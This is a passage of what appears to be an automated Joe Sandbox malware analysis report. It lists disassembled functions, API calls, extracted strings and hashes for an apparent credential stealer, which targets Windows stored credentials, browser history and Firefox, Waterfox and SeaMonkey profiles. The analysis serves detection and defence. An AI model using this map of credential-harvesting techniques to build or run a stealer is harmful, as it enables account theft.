                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError free 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 free 870->877 871->870 877->855
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile$ErrorLastfree
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 77810686-1717621600
                                                                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041249C
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                • String ID: BIN
                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 697348961-0
                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                • API String ID: 3527940856-2068335096
                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                • API String ID: 3527940856-3369679110
                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                • String ID: $0.@
                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
